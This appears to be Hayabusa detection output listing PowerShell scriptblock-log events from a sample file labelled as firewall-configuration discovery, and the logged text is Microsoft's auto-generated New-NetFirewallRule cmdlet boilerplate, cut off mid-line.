+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value =",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_m,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ethodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 